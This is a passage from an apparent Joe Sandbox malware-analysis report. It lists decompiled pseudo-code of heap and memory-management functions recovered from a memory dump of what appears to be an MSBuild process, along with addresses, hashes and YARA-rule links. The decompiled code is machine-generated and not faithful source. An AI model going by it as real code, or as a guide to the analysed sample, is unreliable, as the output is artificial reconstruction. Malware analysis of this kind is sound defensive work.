					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L010C4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E010ACCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x1198504
								E010BFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E010D4F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                                                                                0x010d4bad
                                                                                                0x010d4bbf
                                                                                                0x010d4bc2
                                                                                                0x010d4bc6
                                                                                                0x010d4bcd
                                                                                                0x010d4bd9
                                                                                                0x011167fe
                                                                                                0x01116800
                                                                                                0x010d4ccc
                                                                                                0x010d4ccd
                                                                                                0x010d4cb7
                                                                                                0x010d4cc9
                                                                                                0x010d4cc9
                                                                                                0x010d4bdf
                                                                                                0x010d4be5
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010d4beb
                                                                                                0x010d4bef
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010d4bf5
                                                                                                0x010d4bf9
                                                                                                0x010d4c06
                                                                                                0x010d4c0b
                                                                                                0x010d4c17
                                                                                                0x010d4c1c
                                                                                                0x010d4c1f
                                                                                                0x010d4c25
                                                                                                0x010d4c33
                                                                                                0x010d4c3d
                                                                                                0x010d4c40
                                                                                                0x010d4c43
                                                                                                0x010d4c47
                                                                                                0x010d4c4d
                                                                                                0x010d4c53
                                                                                                0x010d4c54
                                                                                                0x010d4c55
                                                                                                0x010d4c56
                                                                                                0x010d4c5b
                                                                                                0x010d4c5c
                                                                                                0x010d4c63
                                                                                                0x010d4c6b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01116776
                                                                                                0x01116784
                                                                                                0x01116784
                                                                                                0x0111679f
                                                                                                0x011167a7
                                                                                                0x011167af
                                                                                                0x011167ce
                                                                                                0x00000000
                                                                                                0x011167b1
                                                                                                0x011167b7
                                                                                                0x011167b8
                                                                                                0x011167c1
                                                                                                0x011167d3
                                                                                                0x011167d9
                                                                                                0x011167dd
                                                                                                0x010d4c94
                                                                                                0x010d4c94
                                                                                                0x010d4c98
                                                                                                0x010d4c9c
                                                                                                0x010d4ca3
                                                                                                0x011167f4
                                                                                                0x011167f4
                                                                                                0x010d4cb5
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010d4cb5
                                                                                                0x010d4c79
                                                                                                0x010d4c7e
                                                                                                0x010d4c89
                                                                                                0x010d4c8b
                                                                                                0x010d4c8f
                                                                                                0x010d4c8f
                                                                                                0x00000000
                                                                                                0x010d4c89
                                                                                                0x011167c3
                                                                                                0x00000000
                                                                                                0x011167c3
                                                                                                0x011167af
                                                                                                0x010d4c73
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d9ca1caa6a1d1989b2815e98ddf9c4a154715c29660f6d31788ea3d3dfc2e857
                                                                                                • Instruction ID: bf40473cbf0c0c0dec9b273bbed836ede608f71e569b7a15f47c5276dd9f2c5c
                                                                                                • Opcode Fuzzy Hash: d9ca1caa6a1d1989b2815e98ddf9c4a154715c29660f6d31788ea3d3dfc2e857
                                                                                                • Instruction Fuzzy Hash: 0641B231A0062D9BDB61DF68C940BEEB7F4EF45700F0104A9E948EB245EB749E80CF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010D4D3B Relevance: .1, Instructions: 131COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 78%
                                                                                                			E010D4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x119d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E010EFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x1197bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E010EB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L010C4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E010ACCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E010EB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E010EF380(_t67 + 0xc, 0x1085138, 0x10) == 0) {
								 *0x11960d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E010D4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E010D4E70(0x11986b0, 0x10d5690, 0, 0) != 0) {
					_t46 = E010ACCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                                                                0x010d4d3b
                                                                                                0x010d4d4d
                                                                                                0x010d4d53
                                                                                                0x010d4d58
                                                                                                0x010d4d65
                                                                                                0x010d4d6c
                                                                                                0x010d4d71
                                                                                                0x010d4d77
                                                                                                0x010d4d7f
                                                                                                0x010d4d8c
                                                                                                0x010d4d8e
                                                                                                0x010d4dad
                                                                                                0x010d4db0
                                                                                                0x010d4db7
                                                                                                0x010d4db8
                                                                                                0x010d4db9
                                                                                                0x010d4dba
                                                                                                0x010d4dbb
                                                                                                0x010d4dc1
                                                                                                0x010d4dc8
                                                                                                0x010d4dcc
                                                                                                0x010d4dd5
                                                                                                0x010d4dde
                                                                                                0x010d4ddf
                                                                                                0x010d4de0
                                                                                                0x010d4de1
                                                                                                0x010d4de6
                                                                                                0x010d4de7
                                                                                                0x010d4de9
                                                                                                0x010d4df3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01116c7c
                                                                                                0x01116c8a
                                                                                                0x01116c8a
                                                                                                0x01116c9d
                                                                                                0x01116ca7
                                                                                                0x01116cac
                                                                                                0x01116cb2
                                                                                                0x01116cb9
                                                                                                0x00000000
                                                                                                0x01116cbf
                                                                                                0x01116cbf
                                                                                                0x00000000
                                                                                                0x01116cbf
                                                                                                0x01116cb9
                                                                                                0x010d4dfb
                                                                                                0x01116ccf
                                                                                                0x01116cd3
                                                                                                0x010d4e32
                                                                                                0x010d4e39
                                                                                                0x01116ce0
                                                                                                0x01116cf2
                                                                                                0x01116cf2
                                                                                                0x01116ce0
                                                                                                0x010d4e3f
                                                                                                0x010d4e41
                                                                                                0x010d4e51
                                                                                                0x010d4e51
                                                                                                0x010d4e03
                                                                                                0x010d4e03
                                                                                                0x010d4e09
                                                                                                0x010d4e0f
                                                                                                0x010d4e57
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010d4e1b
                                                                                                0x010d4e30
                                                                                                0x010d4e5b
                                                                                                0x010d4e5b
                                                                                                0x00000000
                                                                                                0x010d4e30
                                                                                                0x010d4e11
                                                                                                0x010d4e11
                                                                                                0x010d4e16
                                                                                                0x00000000
                                                                                                0x010d4e16
                                                                                                0x010d4e01
                                                                                                0x00000000
                                                                                                0x010d4e01
                                                                                                0x010d4da5
                                                                                                0x01116c6b
                                                                                                0x00000000
                                                                                                0x010d4dab
                                                                                                0x010d4dab
                                                                                                0x00000000
                                                                                                0x010d4dab

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c8389845f4bea21f4b551ec1a3bbc8bd9a1bb31c4990c3df12b8479502469ecf
                                                                                                • Instruction ID: 3fdfa65f17c40199096f68841703ed622b28cc2d0454c35520cc9b81fa91e7ce
                                                                                                • Opcode Fuzzy Hash: c8389845f4bea21f4b551ec1a3bbc8bd9a1bb31c4990c3df12b8479502469ecf
                                                                                                • Instruction Fuzzy Hash: 2341F471A44318AFEB36DF18CC84FAAB7E9EB54710F0400A9E989DB681D7B4DD44CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0116AA16 Relevance: .1, Instructions: 120COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E0116AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E0116ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E0116AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E0116AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E0114CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L010C77F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E010C7D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0116131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E0114CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}



















                                                                                                0x0116aa1f
                                                                                                0x0116aa21
                                                                                                0x0116aa23
                                                                                                0x0116aa2b
                                                                                                0x0116aa30
                                                                                                0x0116aa36
                                                                                                0x0116aa39
                                                                                                0x0116aa42
                                                                                                0x0116aa75
                                                                                                0x0116aa7a
                                                                                                0x0116aa7c
                                                                                                0x0116aa7c
                                                                                                0x0116aa88
                                                                                                0x0116aa8a
                                                                                                0x0116aa8f
                                                                                                0x0116ab02
                                                                                                0x0116ab04
                                                                                                0x0116aa99
                                                                                                0x0116aaa8
                                                                                                0x0116aaaf
                                                                                                0x0116aab3
                                                                                                0x0116aacc
                                                                                                0x0116aad1
                                                                                                0x0116aad6
                                                                                                0x0116aae0
                                                                                                0x0116aaf3
                                                                                                0x0116aaf9
                                                                                                0x0116aafe
                                                                                                0x0116aafe
                                                                                                0x0116aaf3
                                                                                                0x0116aad6
                                                                                                0x0116aab3
                                                                                                0x0116ab07
                                                                                                0x0116ab0a
                                                                                                0x0116ab11
                                                                                                0x0116ab23
                                                                                                0x0116ab13
                                                                                                0x0116ab1c
                                                                                                0x0116ab1c
                                                                                                0x0116ab2b
                                                                                                0x0116ab44
                                                                                                0x0116ab44
                                                                                                0x0116ab51
                                                                                                0x0116ab51
                                                                                                0x0116aa44
                                                                                                0x0116aa47
                                                                                                0x0116aa4c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0116aa5a
                                                                                                0x0116aa64
                                                                                                0x0116aa72
                                                                                                0x00000000
                                                                                                0x0116aa66
                                                                                                0x0116aa66
                                                                                                0x0116aa68
                                                                                                0x0116aa6a
                                                                                                0x00000000
                                                                                                0x0116aa6a

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                                                • Instruction ID: 38bdf2c4528a71f22f74b24a8e7b9eafe66b8c0fe2f0f46e1ff7a66415d4f7c0
                                                                                                • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                                                • Instruction Fuzzy Hash: 5F31F132B002056BEB198B69DC45BBFFBBEEF80650F058469E905B7291DB76CD10CA50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010B8A0A Relevance: .1, Instructions: 120COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 94%
                                                                                                			E010B8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x119d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E010EB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E010BE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x1081180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E010D1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E010E3C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E010B8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                                                                0x010b8a0a
                                                                                                0x010b8a1c
                                                                                                0x010b8a23
                                                                                                0x010b8a2e
                                                                                                0x010b8a30
                                                                                                0x010b8a36
                                                                                                0x010b8a3c
                                                                                                0x010b8a3e
                                                                                                0x010b8a4a
                                                                                                0x010b8a52
                                                                                                0x010b8a9c
                                                                                                0x010b8aae
                                                                                                0x010b8a58
                                                                                                0x010b8a5e
                                                                                                0x010b8a6a
                                                                                                0x010b8a6f
                                                                                                0x010b8a75
                                                                                                0x010b8a7d
                                                                                                0x010b8a85
                                                                                                0x010b8a86
                                                                                                0x010b8a89
                                                                                                0x010b8a93
                                                                                                0x010b8a99
                                                                                                0x010b8a9b
                                                                                                0x00000000
                                                                                                0x010b8aaf
                                                                                                0x010b8abe
                                                                                                0x010b8ac3
                                                                                                0x010b8acb
                                                                                                0x010b8ad7
                                                                                                0x010b8ae0
                                                                                                0x010b8af1
                                                                                                0x00000000
                                                                                                0x010b8af1
                                                                                                0x010b8acd
                                                                                                0x010b8ad5
                                                                                                0x010b8afb
                                                                                                0x010b8afd
                                                                                                0x010b8aff
                                                                                                0x010b8b07
                                                                                                0x010b8b22
                                                                                                0x010b8b24
                                                                                                0x010b8b2a
                                                                                                0x010b8b2e
                                                                                                0x010b8b3f
                                                                                                0x010b8b78
                                                                                                0x010b8b41
                                                                                                0x010b8b52
                                                                                                0x010b8b54
                                                                                                0x010b8b5c
                                                                                                0x010b8b74
                                                                                                0x010b8b74
                                                                                                0x010b8b5c
                                                                                                0x010b8b3f
                                                                                                0x010b8b5e
                                                                                                0x010b8b61
                                                                                                0x010b8b64
                                                                                                0x010b8b64
                                                                                                0x010b8b6c
                                                                                                0x010b8b6c
                                                                                                0x010b8b11
                                                                                                0x01109cd5
                                                                                                0x01109cd5
                                                                                                0x010b8b17
                                                                                                0x010b8b1a
                                                                                                0x010b8b1a
                                                                                                0x00000000
                                                                                                0x010b8ad5
                                                                                                0x010b8a89

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 12902947f55111ef7b8819026442c7620410c891580089924a949a52df7d6f4d
                                                                                                • Instruction ID: 6d90d4ed5eeacbb5be770bcbffe9d82b796dd30dc04cb27b6d588e3e3e70d839
                                                                                                • Opcode Fuzzy Hash: 12902947f55111ef7b8819026442c7620410c891580089924a949a52df7d6f4d
                                                                                                • Instruction Fuzzy Hash: D64174B4A0022D9BDB64DF69CCD8AE9B7F8FB54300F1085EAD95997252D7709E80CF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0116FDE2 Relevance: .1, Instructions: 116COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 76%
                                                                                                			E0116FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E0116FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E01170A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E010C7D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E01161608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E01172B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E0116C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E0116DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E010C7D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E0116A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                                                                                                0x0116fde7
                                                                                                0x0116fde8
                                                                                                0x0116fdec
                                                                                                0x0116fdee
                                                                                                0x0116fdf5
                                                                                                0x0116fdf7
                                                                                                0x0116fdfc
                                                                                                0x0116fe19
                                                                                                0x0116fe22
                                                                                                0x0116fe26
                                                                                                0x0116fec6
                                                                                                0x0116fecd
                                                                                                0x0116fed5
                                                                                                0x0116fee7
                                                                                                0x0116fed7
                                                                                                0x0116fee0
                                                                                                0x0116fee0
                                                                                                0x0116feef
                                                                                                0x0116ff00
                                                                                                0x0116ff02
                                                                                                0x0116ff07
                                                                                                0x0116ff07
                                                                                                0x00000000
                                                                                                0x0116feef
                                                                                                0x0116fe33
                                                                                                0x0116fe55
                                                                                                0x0116fe59
                                                                                                0x0116fe5b
                                                                                                0x0116fe5e
                                                                                                0x0116fe69
                                                                                                0x0116fe6d
                                                                                                0x0116fe6d
                                                                                                0x0116fe69
                                                                                                0x0116fe35
                                                                                                0x0116fe41
                                                                                                0x0116fe41
                                                                                                0x0116fe79
                                                                                                0x0116fe8b
                                                                                                0x0116fe7b
                                                                                                0x0116fe84
                                                                                                0x0116fe84
                                                                                                0x0116fe93
                                                                                                0x00000000
                                                                                                0x0116fea8
                                                                                                0x0116feba
                                                                                                0x00000000
                                                                                                0x0116feba
                                                                                                0x0116fdfe
                                                                                                0x0116fe01
                                                                                                0x0116fe02
                                                                                                0x0116fe08
                                                                                                0x0116ff0c
                                                                                                0x0116ff14
                                                                                                0x0116ff14

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                                                • Instruction ID: 7656a1dd70707f3444d8c309db9de1637038ad58839d1d62ac8cf943c366cb13
                                                                                                • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                                                • Instruction Fuzzy Hash: 1F3126323006426FD32A9B6CDC64F6A7FEDEBC5A40F094058E5468B342DB72DC22C761
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0116EA55 Relevance: .1, Instructions: 111COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 70%
                                                                                                			E0116EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E010C2280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E0116E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E010AF900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E010BFFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E0116AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E0116BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E010C7D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E0115FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E010BFFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E0116A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                                                                                                0x0116ea55
                                                                                                0x0116ea66
                                                                                                0x0116ea68
                                                                                                0x0116ea6c
                                                                                                0x0116ea6f
                                                                                                0x0116ea72
                                                                                                0x0116ea75
                                                                                                0x0116ea7a
                                                                                                0x0116ea7a
                                                                                                0x0116ea7e
                                                                                                0x0116ea80
                                                                                                0x0116ea85
                                                                                                0x0116ea8b
                                                                                                0x0116eab5
